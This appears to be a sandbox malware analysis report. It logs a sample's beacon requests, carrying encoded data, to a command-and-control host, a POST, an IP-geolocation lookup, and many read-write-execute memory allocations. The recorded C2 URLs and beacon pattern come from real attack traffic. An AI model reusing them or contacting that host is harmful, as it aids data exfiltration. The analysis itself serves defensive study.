request	GET http://cd03477.tmweb.ru/s37gue3wcapintnq8aymsm4gxqthbf8ke/4xunxsulhh0vjwpro1yk0h20gz1osslxmtcnp352fd8u4inmyfrkt7qqfo5zvxwy/1qjf26r6i5eaf11049cwi97t4latqqpylcotv8zbuow2bxxg0lm7906kvfp0pnsg5nmc3x4ysz68otkbpj39nu/51afc5b336611bc72e86f878effc8f43.php?4np9zI4szio6ayvNH2RdxaGmV=mMK53KaJiq8UIEe720P8Sdd&wFII9dgDoHfri3pdfQQFPxtN90hQXW=JtNJxBRKEJ5qBi&Z8LvdBMYr9V5JI5QpRrV7Uu1b=GL6UGsoM&f3c39371923a2a97e8e2004599d6c568=gjMygjMyQ2MhdTNhdjN3IWNiJjNlJWMmR2NzMzY1gjMxMTO1QGO0cDM&cbed01b57bb84a42c95af8de36c27ba3=wYilDZ4AzM0ITNhN2YmF2YjFTMlVjZ1MjMzMDMkNDNlhTZkJmMiZzM&9bed4c0d62fb1d6af8403144370ee8e2=9JSZiNzMhdDZmJTO5IWLyETN50COlFTMtYDM3ATLhBDO3Q2NiFGXclnclZ3bjVmUcxlODJiOigGdhBlIsISNuQjI6Iibvl2cyVmVrJ3b3VWbhJnRiwiIud3butmbVJiOigGdhBVbhJ3ZlxWZUJCLiIiOiMHcwFUbhVGdTJCLi42dv52auVlI6ICRJJXZzVVbhVGdTJCLi42dv52auVlI6IiclNXVtFWZ0NlIsIib39mbr5WViojIn5WYM1WYlR3UiwiIud3butmbVJiOigGdhBVbhVGdTJCLi4GXyxVKYmL7l6J7g8WakVXQg42bpRXaulmZlREIodWaIhCrB2OtdyOinuuI6Iycl52boB3byNWaNJCLi4GXyxVMZFETQNVSExFXuwFXcxlI6IycuVWZyN2UiwiIiojIz1WYjJWZXJCL5ETM1ojINFkUiwiIw42bpRXYy9Gcy92QgUGbjFmcPJiOiQmch9mYyVGa09WTiwiIB9CXOJiOiwGbhdXZylmRiwiIB9CXOJiOiMXdylmdpRnbBJCLi0iI6ICUJ5UQMJCLigkYtdEIrVGdv5mbpJiOiM1TJJkIsIieIdEM44iMgAEIVB1QgADM0gTL1kGIp0EVoUmcvNEIpIFKsVGdulkI6ISZtFmTVB1QiwiIwSY7Ry460aJ7g0Lltjpnrj7tqDSQHZFIASK7cGZ7iojIl1WYOVFUHJye&0592b27fd9372485389b3e4b27878b25=ETZ3ETYlZ2YyATOmRDMhF2YwkzMwgjNlJ2YwI2M2MDN&61f3e9450f43a23b30349f40c7b48399=IGOkFmN4E2MlV2MhNGM5cDN3YGOwcDM3UzNlBDM3EWN
request	GET http://cd03477.tmweb.ru/s37gue3wcapintnq8aymsm4gxqthbf8ke/4xunxsulhh0vjwpro1yk0h20gz1osslxmtcnp352fd8u4inmyfrkt7qqfo5zvxwy/1qjf26r6i5eaf11049cwi97t4latqqpylcotv8zbuow2bxxg0lm7906kvfp0pnsg5nmc3x4ysz68otkbpj39nu/51afc5b336611bc72e86f878effc8f43.php?4np9zI4szio6ayvNH2RdxaGmV=mMK53KaJiq8UIEe720P8Sdd&wFII9dgDoHfri3pdfQQFPxtN90hQXW=JtNJxBRKEJ5qBi&Z8LvdBMYr9V5JI5QpRrV7Uu1b=GL6UGsoM&f3c39371923a2a97e8e2004599d6c568=gjMygjMyQ2MhdTNhdjN3IWNiJjNlJWMmR2NzMzY1gjMxMTO1QGO0cDM&cbed01b57bb84a42c95af8de36c27ba3=wYilDZ4AzM0ITNhN2YmF2YjFTMlVjZ1MjMzMDMkNDNlhTZkJmMiZzM&3e2cba95dc28875482e835607ed9c48a=gLu4ycll2av92Ygcmbph2Y0VmR&4b836cb6b63ff52e76cc353a8666a413=ETZ3ETYlZ2YyATOmRDMhF2YwkzMwgjNlJ2YwI2M2MDN&222849a66532f350bf8537e61aabb5b0=ITOklDMzgTYldDZ3ITO4UDNiNjYyEGOhlzYycDNiRjZ
request	GET http://cd03477.tmweb.ru/s37gue3wcapintnq8aymsm4gxqthbf8ke/4xunxsulhh0vjwpro1yk0h20gz1osslxmtcnp352fd8u4inmyfrkt7qqfo5zvxwy/1qjf26r6i5eaf11049cwi97t4latqqpylcotv8zbuow2bxxg0lm7906kvfp0pnsg5nmc3x4ysz68otkbpj39nu/51afc5b336611bc72e86f878effc8f43.php?4np9zI4szio6ayvNH2RdxaGmV=mMK53KaJiq8UIEe720P8Sdd&wFII9dgDoHfri3pdfQQFPxtN90hQXW=JtNJxBRKEJ5qBi&Z8LvdBMYr9V5JI5QpRrV7Uu1b=GL6UGsoM&f3c39371923a2a97e8e2004599d6c568=gjMygjMyQ2MhdTNhdjN3IWNiJjNlJWMmR2NzMzY1gjMxMTO1QGO0cDM&cbed01b57bb84a42c95af8de36c27ba3=wYilDZ4AzM0ITNhN2YmF2YjFTMlVjZ1MjMzMDMkNDNlhTZkJmMiZzM&3e2cba95dc28875482e835607ed9c48a=u4iLzRmcvd3czFGcgcmbph2Y0VmR&4b836cb6b63ff52e76cc353a8666a413=ETZ3ETYlZ2YyATOmRDMhF2YwkzMwgjNlJ2YwI2M2MDN&222849a66532f350bf8537e61aabb5b0=ITOklDMzgTYldDZ3ITO4UDNiNjYyEGOhlzYycDNiRjZ
request	GET http://cd03477.tmweb.ru/s37gue3wcapintnq8aymsm4gxqthbf8ke/4xunxsulhh0vjwpro1yk0h20gz1osslxmtcnp352fd8u4inmyfrkt7qqfo5zvxwy/1qjf26r6i5eaf11049cwi97t4latqqpylcotv8zbuow2bxxg0lm7906kvfp0pnsg5nmc3x4ysz68otkbpj39nu/51afc5b336611bc72e86f878effc8f43.php?4np9zI4szio6ayvNH2RdxaGmV=mMK53KaJiq8UIEe720P8Sdd&wFII9dgDoHfri3pdfQQFPxtN90hQXW=JtNJxBRKEJ5qBi&Z8LvdBMYr9V5JI5QpRrV7Uu1b=GL6UGsoM&f3c39371923a2a97e8e2004599d6c568=gjMygjMyQ2MhdTNhdjN3IWNiJjNlJWMmR2NzMzY1gjMxMTO1QGO0cDM&cbed01b57bb84a42c95af8de36c27ba3=wYilDZ4AzM0ITNhN2YmF2YjFTMlVjZ1MjMzMDMkNDNlhTZkJmMiZzM&3e2cba95dc28875482e835607ed9c48a=4iLuMXby9mZgcmbph2Y0VmR&4b836cb6b63ff52e76cc353a8666a413=ETZ3ETYlZ2YyATOmRDMhF2YwkzMwgjNlJ2YwI2M2MDN&222849a66532f350bf8537e61aabb5b0=ITOklDMzgTYldDZ3ITO4UDNiNjYyEGOhlzYycDNiRjZ
request	GET http://cd03477.tmweb.ru/s37gue3wcapintnq8aymsm4gxqthbf8ke/4xunxsulhh0vjwpro1yk0h20gz1osslxmtcnp352fd8u4inmyfrkt7qqfo5zvxwy/1qjf26r6i5eaf11049cwi97t4latqqpylcotv8zbuow2bxxg0lm7906kvfp0pnsg5nmc3x4ysz68otkbpj39nu/51afc5b336611bc72e86f878effc8f43.php?4np9zI4szio6ayvNH2RdxaGmV=mMK53KaJiq8UIEe720P8Sdd&wFII9dgDoHfri3pdfQQFPxtN90hQXW=JtNJxBRKEJ5qBi&Z8LvdBMYr9V5JI5QpRrV7Uu1b=GL6UGsoM&f3c39371923a2a97e8e2004599d6c568=gjMygjMyQ2MhdTNhdjN3IWNiJjNlJWMmR2NzMzY1gjMxMTO1QGO0cDM&cbed01b57bb84a42c95af8de36c27ba3=wYilDZ4AzM0ITNhN2YmF2YjFTMlVjZ1MjMzMDMkNDNlhTZkJmMiZzM&3e2cba95dc28875482e835607ed9c48a=4iLuM0Qgcmbph2Y0VmR&4b836cb6b63ff52e76cc353a8666a413=ETZ3ETYlZ2YyATOmRDMhF2YwkzMwgjNlJ2YwI2M2MDN&222849a66532f350bf8537e61aabb5b0=ITOklDMzgTYldDZ3ITO4UDNiNjYyEGOhlzYycDNiRjZ
request	GET http://cd03477.tmweb.ru/s37gue3wcapintnq8aymsm4gxqthbf8ke/4xunxsulhh0vjwpro1yk0h20gz1osslxmtcnp352fd8u4inmyfrkt7qqfo5zvxwy/1qjf26r6i5eaf11049cwi97t4latqqpylcotv8zbuow2bxxg0lm7906kvfp0pnsg5nmc3x4ysz68otkbpj39nu/51afc5b336611bc72e86f878effc8f43.php?4np9zI4szio6ayvNH2RdxaGmV=mMK53KaJiq8UIEe720P8Sdd&wFII9dgDoHfri3pdfQQFPxtN90hQXW=JtNJxBRKEJ5qBi&Z8LvdBMYr9V5JI5QpRrV7Uu1b=GL6UGsoM&f3c39371923a2a97e8e2004599d6c568=gjMygjMyQ2MhdTNhdjN3IWNiJjNlJWMmR2NzMzY1gjMxMTO1QGO0cDM&cbed01b57bb84a42c95af8de36c27ba3=wYilDZ4AzM0ITNhN2YmF2YjFTMlVjZ1MjMzMDMkNDNlhTZkJmMiZzM&3e2cba95dc28875482e835607ed9c48a=4iLu0WYlR3Ugcmbph2Y0VmR&4b836cb6b63ff52e76cc353a8666a413=ETZ3ETYlZ2YyATOmRDMhF2YwkzMwgjNlJ2YwI2M2MDN&222849a66532f350bf8537e61aabb5b0=ITOklDMzgTYldDZ3ITO4UDNiNjYyEGOhlzYycDNiRjZ
request	GET http://cd03477.tmweb.ru/s37gue3wcapintnq8aymsm4gxqthbf8ke/4xunxsulhh0vjwpro1yk0h20gz1osslxmtcnp352fd8u4inmyfrkt7qqfo5zvxwy/1qjf26r6i5eaf11049cwi97t4latqqpylcotv8zbuow2bxxg0lm7906kvfp0pnsg5nmc3x4ysz68otkbpj39nu/51afc5b336611bc72e86f878effc8f43.php?4np9zI4szio6ayvNH2RdxaGmV=mMK53KaJiq8UIEe720P8Sdd&wFII9dgDoHfri3pdfQQFPxtN90hQXW=JtNJxBRKEJ5qBi&Z8LvdBMYr9V5JI5QpRrV7Uu1b=GL6UGsoM&f3c39371923a2a97e8e2004599d6c568=gjMygjMyQ2MhdTNhdjN3IWNiJjNlJWMmR2NzMzY1gjMxMTO1QGO0cDM&cbed01b57bb84a42c95af8de36c27ba3=wYilDZ4AzM0ITNhN2YmF2YjFTMlVjZ1MjMzMDMkNDNlhTZkJmMiZzM&3e2cba95dc28875482e835607ed9c48a=4iLu0WYydWZsVGVgcmbph2Y0VmR&4b836cb6b63ff52e76cc353a8666a413=ETZ3ETYlZ2YyATOmRDMhF2YwkzMwgjNlJ2YwI2M2MDN&222849a66532f350bf8537e61aabb5b0=ITOklDMzgTYldDZ3ITO4UDNiNjYyEGOhlzYycDNiRjZ
request	GET http://cd03477.tmweb.ru/s37gue3wcapintnq8aymsm4gxqthbf8ke/4xunxsulhh0vjwpro1yk0h20gz1osslxmtcnp352fd8u4inmyfrkt7qqfo5zvxwy/1qjf26r6i5eaf11049cwi97t4latqqpylcotv8zbuow2bxxg0lm7906kvfp0pnsg5nmc3x4ysz68otkbpj39nu/51afc5b336611bc72e86f878effc8f43.php?4np9zI4szio6ayvNH2RdxaGmV=mMK53KaJiq8UIEe720P8Sdd&wFII9dgDoHfri3pdfQQFPxtN90hQXW=JtNJxBRKEJ5qBi&Z8LvdBMYr9V5JI5QpRrV7Uu1b=GL6UGsoM&f3c39371923a2a97e8e2004599d6c568=gjMygjMyQ2MhdTNhdjN3IWNiJjNlJWMmR2NzMzY1gjMxMTO1QGO0cDM&cbed01b57bb84a42c95af8de36c27ba3=wYilDZ4AzM0ITNhN2YmF2YjFTMlVjZ1MjMzMDMkNDNlhTZkJmMiZzM&3e2cba95dc28875482e835607ed9c48a=4iLu42bpRXYtJ3bm5WagIXZoR3bgcmbph2Y0VmR&4b836cb6b63ff52e76cc353a8666a413=ETZ3ETYlZ2YyATOmRDMhF2YwkzMwgjNlJ2YwI2M2MDN&222849a66532f350bf8537e61aabb5b0=ITOklDMzgTYldDZ3ITO4UDNiNjYyEGOhlzYycDNiRjZ
request	GET http://cd03477.tmweb.ru/s37gue3wcapintnq8aymsm4gxqthbf8ke/4xunxsulhh0vjwpro1yk0h20gz1osslxmtcnp352fd8u4inmyfrkt7qqfo5zvxwy/1qjf26r6i5eaf11049cwi97t4latqqpylcotv8zbuow2bxxg0lm7906kvfp0pnsg5nmc3x4ysz68otkbpj39nu/51afc5b336611bc72e86f878effc8f43.php?4np9zI4szio6ayvNH2RdxaGmV=mMK53KaJiq8UIEe720P8Sdd&wFII9dgDoHfri3pdfQQFPxtN90hQXW=JtNJxBRKEJ5qBi&Z8LvdBMYr9V5JI5QpRrV7Uu1b=GL6UGsoM&f3c39371923a2a97e8e2004599d6c568=gjMygjMyQ2MhdTNhdjN3IWNiJjNlJWMmR2NzMzY1gjMxMTO1QGO0cDM&cbed01b57bb84a42c95af8de36c27ba3=wYilDZ4AzM0ITNhN2YmF2YjFTMlVjZ1MjMzMDMkNDNlhTZkJmMiZzM&3e2cba95dc28875482e835607ed9c48a=wkzM4YzN54SNwoDMwoDMwAiOl1Wa0BCZlNHchxWRgESZu9GR&4b836cb6b63ff52e76cc353a8666a413=ETZ3ETYlZ2YyATOmRDMhF2YwkzMwgjNlJ2YwI2M2MDN&222849a66532f350bf8537e61aabb5b0=ITOklDMzgTYldDZ3ITO4UDNiNjYyEGOhlzYycDNiRjZ
request	POST http://cd03477.tmweb.ru/s37gue3wcapintnq8aymsm4gxqthbf8ke/4xunxsulhh0vjwpro1yk0h20gz1osslxmtcnp352fd8u4inmyfrkt7qqfo5zvxwy/1qjf26r6i5eaf11049cwi97t4latqqpylcotv8zbuow2bxxg0lm7906kvfp0pnsg5nmc3x4ysz68otkbpj39nu/51afc5b336611bc72e86f878effc8f43.php?4np9zI4szio6ayvNH2RdxaGmV=mMK53KaJiq8UIEe720P8Sdd&wFII9dgDoHfri3pdfQQFPxtN90hQXW=JtNJxBRKEJ5qBi&Z8LvdBMYr9V5JI5QpRrV7Uu1b=GL6UGsoM&f3c39371923a2a97e8e2004599d6c568=gjMygjMyQ2MhdTNhdjN3IWNiJjNlJWMmR2NzMzY1gjMxMTO1QGO0cDM&cbed01b57bb84a42c95af8de36c27ba3=wYilDZ4AzM0ITNhN2YmF2YjFTMlVjZ1MjMzMDMkNDNlhTZkJmMiZzM
request	GET https://ipinfo.io/json

Sends data using the HTTP POST Method (1 event)

request

Resolves a suspicious Top Level Domain (TLD) (1 event)

domain

cd03477.tmweb.ru

description

Russian Federation domain TLD

Allocates read-write-execute memory (usually to unpack itself) (50 out of 181 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory March 17, 2021, 11:03 p.m.	process_identifier: 1908 region_size: 1310720 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00700000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 17, 2021, 11:03 p.m.	process_identifier: 1908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00800000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory March 17, 2021, 11:03 p.m.	process_identifier: 1908 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72741000 process_handle: 0xffffffff	1
NtProtectVirtualMemory March 17, 2021, 11:03 p.m.	process_identifier: 1908 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72742000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 17, 2021, 11:03 p.m.	process_identifier: 1908 region_size: 720896 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004b0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 17, 2021, 11:03 p.m.	process_identifier: 1908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00520000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 17, 2021, 11:03 p.m.	process_identifier: 1908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003d2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 17, 2021, 11:03 p.m.	process_identifier: 1908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00485000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 17, 2021, 11:03 p.m.	process_identifier: 1908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0048b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 17, 2021, 11:03 p.m.	process_identifier: 1908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00487000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 17, 2021, 11:03 p.m.	process_identifier: 1908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003ec000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 17, 2021, 11:03 p.m.	process_identifier: 1908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005b0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 17, 2021, 11:03 p.m.	process_identifier: 1908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003da000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 17, 2021, 11:03 p.m.	process_identifier: 1908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0047a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 17, 2021, 11:03 p.m.	process_identifier: 1908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00477000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 17, 2021, 11:03 p.m.	process_identifier: 1908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003ea000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 17, 2021, 11:03 p.m.	process_identifier: 1908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00476000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 17, 2021, 11:03 p.m.	process_identifier: 1908 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005b1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory March 17, 2021, 11:03 p.m.	process_identifier: 1908 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72022000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 17, 2021, 11:03 p.m.	process_identifier: 1908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005b3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 17, 2021, 11:03 p.m.	process_identifier: 1908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005b4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 17, 2021, 11:03 p.m.	process_identifier: 1908 region_size: 20480 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005b5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 17, 2021, 11:03 p.m.	process_identifier: 1908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005ba000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 17, 2021, 11:03 p.m.	process_identifier: 1908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005bb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 17, 2021, 11:03 p.m.	process_identifier: 1908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005bc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 17, 2021, 11:03 p.m.	process_identifier: 1908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005bd000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 17, 2021, 11:04 p.m.	process_identifier: 1908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005be000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 17, 2021, 11:04 p.m.	process_identifier: 1908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005bf000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 17, 2021, 11:04 p.m.	process_identifier: 1908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05060000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 17, 2021, 11:04 p.m.	process_identifier: 1908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05061000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 17, 2021, 11:04 p.m.	process_identifier: 1908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05062000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 17, 2021, 11:04 p.m.	process_identifier: 1940 region_size: 1966080 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00810000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 17, 2021, 11:04 p.m.	process_identifier: 1940 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x009b0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory March 17, 2021, 11:04 p.m.	process_identifier: 1940 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72741000 process_handle: 0xffffffff	1
NtProtectVirtualMemory March 17, 2021, 11:04 p.m.	process_identifier: 1940 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72742000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 17, 2021, 11:04 p.m.	process_identifier: 1940 region_size: 1507328 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02100000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 17, 2021, 11:04 p.m.	process_identifier: 1940 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02230000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 17, 2021, 11:04 p.m.	process_identifier: 1940 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00492000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 17, 2021, 11:04 p.m.	process_identifier: 1940 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005c5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 17, 2021, 11:04 p.m.	process_identifier: 1940 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005cb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 17, 2021, 11:04 p.m.	process_identifier: 1940 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005c7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 17, 2021, 11:04 p.m.	process_identifier: 1940 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004ac000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 17, 2021, 11:04 p.m.	process_identifier: 1940 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00b30000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 17, 2021, 11:04 p.m.	process_identifier: 1940 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004b6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 17, 2021, 11:04 p.m.	process_identifier: 1940 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004ba000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 17, 2021, 11:04 p.m.	process_identifier: 1940 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004b7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 17, 2021, 11:04 p.m.	process_identifier: 1940 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0049a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 17, 2021, 11:04 p.m.	process_identifier: 1940 region_size: 20480 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00b31000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 17, 2021, 11:04 p.m.	process_identifier: 1940 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00b36000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
